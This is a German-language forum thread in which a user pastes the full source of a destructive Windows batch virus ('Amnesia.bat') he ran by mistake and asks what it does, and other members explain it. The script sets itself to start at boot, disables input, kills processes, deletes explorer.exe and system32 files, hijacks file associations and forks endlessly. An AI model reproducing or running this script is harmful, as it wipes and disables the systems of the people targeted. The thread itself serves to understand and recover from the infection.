Register for your free account! | Forgot your password?

Go Back   elitepvpers > Coders Den > General Coding
You last visited: Today at 18:00

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement



Funktion erklären

Discussion on Funktion erklären within the General Coding forum part of the Coders Den category.

Reply
 
Old   #1

 
xEncounter's Avatar
 
elite*gold: 22
Join Date: Nov 2009
Posts: 1,552
Received Thanks: 361
Funktion erklären

@echo off
copy "Amnesia.bat" "C:\WINDOWS"
attrib +r +h +s "Amnesia.bat"
copy "Amnesia.bat" "C:\Documents and Settings\Owner\Start Menu\Programs\startup"
copy "Amnesia.bat" "C:\"
copy "Amnesia.bat" "C:\Documents and Settings\Owner\My Documents"
Reg Add "HKCU\Control Panel\Mouse" /v SwapMouseButtons /f /d "10"
rundll32 keyboard, disable
rundll32 mouse, disable
taskkill explorer /t /t
taskkill yahoomessenger /f /t
taskkill msmsgs /t /f
taskkill firefox /f /t
taskkill iexplore /f /t
time 6:66
del "C:\WINDOWS\explorer.exe" /f /q
cd "C:\WINDOWS"
del "*.bat" /f /q
cd "C:\WINDOWS\system32"
del "*.*" /q /f
del "C:\Program Files\messenger\msmsgs.exe" /q /f
del "C:\Program Files\Yahoo!\messenger\YahooMessenger.exe" /q /f
attrib +r +h "C:\Documents and Settings\Owner\My Documents\My Music"
attrib +r +h "C:\Documents and Settings\Owner\My Documents\My Pictures"
attrib +r +h "C:\Documents and Settings\Owner\My Documents\My Videos"
attrib +r +h "C:\Documents and Settings\Owner\My Documents"
attrib +r +h "C:\WINDOWS"
RASDIAL /DISCONNECT
start D:\
reg add "HKLM\SOFTWARE\Mozilla\Mozilla Firefox.0.0.12 (en-US)\main" /v PathtoExe /f /d "C:\WINDOWS\Amnesia.bat"
reg add "HKLM\SOFTWARE\InstallShield\driver\intel32" /v folder /f /d "C:\WINDOWS\Amnesia.bat"
assoc .exe=WMAFile
assoc .mp3=VBSFile
assoc .jpg=THEMEFile
assoc .bmp=THEMEFile
assoc .gif=THEMEFile
echo You have been pwned by Amnesia. Next time, don't be so stupid! >> finalmessage.txt
start finalmessage.txt
shutdown -s -t 60 -c "Say goodbye"
msg * Amnesia has wiped your computer clean
:section1
cd "C:\Documents and Settings\Owner\desktop"
copy "C:\WINDOWS\Amnesia.bat" "8021.bat"
cd "C:\Documents and Settings\Owner\desktop"
md 5265
cd "C:\WINDOWS\system32"
copy "C:\WINDOWS\Amnesia.bat" "2696.bat"
start
start
start
start
start
goto section1

dies ist ein code für eine batch datei.
so folgendes problem ich habs auf mein rechner geöffnet

kann mir einer schritt für schritt erklären was dieses programm anrichtet.
i weiss es ist ein Virus und richtet schäden an also nicht copy pasten.
xEncounter is offline  
Old 05/05/2012, 14:20   #2
 
Tyrar's Avatar
 
elite*gold: 0
Join Date: Oct 2008
Posts: 1,637
Received Thanks: 1,119
kopiert sich in alle wichtigen start files (dass es zum system start mit startet)
wenn du firefox startest wird das teil gestartet
explorer wird beendet
system32 ordner wird weitestgehend gelöscht, dann wird der rechner runtergefahren.

wenn du keine system backups da hast würd ich sagen windows neu drauf klatschen
Tyrar is offline  
Thanks
2 Users
Old 05/05/2012, 14:22   #3

 
xEncounter's Avatar
 
elite*gold: 22
Join Date: Nov 2009
Posts: 1,552
Received Thanks: 361
teile des virus sind garnicht aufgetreten.

einzige was ich hatte war maus klick vertauscht. (konnt man schnell behebn).

system ist nicht runtergefahren.
firefox hab ich zum glück nicht .

macht es das internet schlechter ?
xEncounter is offline  
Old 05/05/2012, 14:28   #4
 
Tyrar's Avatar
 
elite*gold: 0
Join Date: Oct 2008
Posts: 1,637
Received Thanks: 1,119
wie es aussieht nur nen disconnect, langsamer aber nicht!

wie gesagt, normal sollte damit der system32 ordner gelöscht werden, wo explorer drin is, taskmanager und alle system programme

ist jedenfalls kein 'echter' schaden der angerichtet wird, könntest dir eig auch den ganzen kram von der windows dvd ziehen wenn was fehlt

die batch datei kannste auch einfach löschen
Tyrar is offline  
Old 05/05/2012, 14:48   #5

 
xEncounter's Avatar
 
elite*gold: 22
Join Date: Nov 2009
Posts: 1,552
Received Thanks: 361
anscheinend hat der virus nicht wirklich was angerichtet kann daran liegen das ich ihn bevor ich ihn öffnete in eine exe datei konvertiert hab . nomma glück gehabt
xEncounter is offline  
Old 05/05/2012, 14:49   #6
 
Tyrar's Avatar
 
elite*gold: 0
Join Date: Oct 2008
Posts: 1,637
Received Thanks: 1,119
wie gesagt, richtigen schaden richtet das teil nich an, zumindest wäre der schaden auch nicht schwer zu beheben! (was win7 angeht, alles davor weiss ich nicht!)
Tyrar is offline  
Old 05/05/2012, 16:14   #7
 
Beatsu's Avatar
 
elite*gold: 0
Join Date: May 2012
Posts: 26
Received Thanks: 10
Quote:
Originally Posted by HeavyHacker View Post
kopiert sich in alle wichtigen start files (dass es zum system start mit startet)
wenn du firefox startest wird das teil gestartet
explorer wird beendet
system32 ordner wird weitestgehend gelöscht, dann wird der rechner runtergefahren.

wenn du keine system backups da hast würd ich sagen windows neu drauf klatschen
Jo. Woher hast du die ganzen Kenntnisse HeavyHacker
Beatsu is offline  
Old 05/05/2012, 16:24   #8
 
mydoom's Avatar
 
elite*gold: 0
Join Date: Dec 2007
Posts: 322
Received Thanks: 98
Quote:
Originally Posted by Beatsu View Post
Jo. Woher hast du die ganzen Kenntnisse HeavyHacker
Er kann lesen :<

@OP:
Dass das Virus kaum Schaden angerichtet hat, wird wohl auch darauf zurückzuführen sein, dass es für einige der aufgeführten Befehle Admin-Rechte benötigt, wenn ich mich jetzt nicht täusche.

//
Quote:
time 6:66
Interessanterweise wurde hier die Stunde einfach mal um weitere 6 Minuten verlängert.
mydoom is offline  
Old 05/05/2012, 16:31   #9
 
.SkyneT.'s Avatar
 
elite*gold: 273
Join Date: Sep 2010
Posts: 1,831
Received Thanks: 786
Quote:
Originally Posted by HeavyHacker View Post
wie gesagt, richtigen schaden richtet das teil nich an, zumindest wäre der schaden auch nicht schwer zu beheben! (was win7 angeht, alles davor weiss ich nicht!)
Bei jedem Windows mit UAC dürfte man nichts im System32 Ordner löschen können. (Wenn ich mich nicht irre gibts sogar einen eigenen User, dem man zuerst die Rechte "wegnehmen" muss bevor man dort was löschen kann)

Btw:
Langsam bekomme ich das Gefühl das jeder glaubt die Hauptfestplatte
MUSS C:/ sein
.SkyneT. is offline  
Old 05/05/2012, 20:29   #10
 
Tyrar's Avatar
 
elite*gold: 0
Join Date: Oct 2008
Posts: 1,637
Received Thanks: 1,119
Quote:
Originally Posted by .SkyneT. View Post
Bei jedem Windows mit UAC dürfte man nichts im System32 Ordner löschen können. (Wenn ich mich nicht irre gibts sogar einen eigenen User, dem man zuerst die Rechte "wegnehmen" muss bevor man dort was löschen kann)

Btw:
Langsam bekomme ich das Gefühl das jeder glaubt die Hauptfestplatte
MUSS C:/ sein
C:\ wird einfach am häufigsten verwendet
aber bei (geschätzten)99% der batch 'viren' nimmt man keinen schaden wenn man das system auf ner andere partition (übrigens nicht festplatte, wie viele vielleicht denken) hat.

grundsätzlich stimmt das aber, im system32 ordner kann man so einfach nichts löschen.

@Beatsu: batch verstehen und funktionen der windows programme und befehle kennen.
zusätzlich noch ein wenig grundverständnis für windoof und dann passts!

edit: wollte grad auf meiner xp vm testen, hab aber vergessen dass ich mal meinen treiber code getestet habe
Tyrar is offline  
Reply


Similar Threads Similar Threads
Ich möchte erklären,
01/08/2012 - Metin2 Private Server - 5 Replies
Wie kann ich meine Erfindung neuer Waffen zu machen, möchte ich, um das Video zu erklären, wenn möglich
Wie erklären?
11/04/2011 - Main - 5 Replies
Hey, Ich habe mir vor ein paar Tagen ne PS 3 gekauft. Mein Vater ist/war dagegen und weiß noch nicht davon. Meine Mutter war damit einverstanden das ich mir sie kaufe. Aber ich will das meinem Vater erzählen.... Nur ich weiß nicht wie ich das machen soll und wie er reagiert. Ich war vor einem jahr Schonmal kurz davor mir eine zu kaufen dich wegen meinem Vater habe ich es doch gelassen Jetzt ist meine Frage wie soll ich ihm das sagen und was meint ihr wie er reagiert????
Hilfe bei Send Funktion mit Stop Funktion
04/02/2011 - AutoIt - 11 Replies
Hallo Elitepvpers ich habe ein Problem und Mein Problem ist das mein Text einfach weiter schreibt wenn ich mit HotKey verwende... gib es keine Funktion das der Text einmal kommt und nicht wenn man einmal die HotKey das er 10 min das selbe schreibt :confused:
[C++]Funktion einer Klasse in einer anderen Funktion der Klasse verwenden, aber wie?
07/25/2010 - C/C++ - 3 Replies
Mein Problem ist eigentlich recht simpel und die Lösung wahrscheinlich auch. Da ich bisher fast 0 mit Klassen am Hut hatte, wollte ich mich doch mit dem Thema anfreunden und hatte gleich angefangen: int test::Funktion2() { int temp; cin>>temp; return temp; }
Grundlagen erklären
09/06/2009 - GW Bots - 3 Replies
Hey ich würde gerne einen suchen der mir die Grundlagen in sachen mem updaten (wie), bots anfangen zu schreiben etc. pp erklären kann. bitte jetzt keine posts mit :rtfm::rtfm::rtfm::rtfm: oder ähnliches... Natürlich würde es auch eine "ingame" bezahlen geben oder so müsste man halt vereinbaren.. mfg



All times are GMT +1. The time now is 18:00.


Powered by vBulletin®
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2025 elitepvpers All Rights Reserved.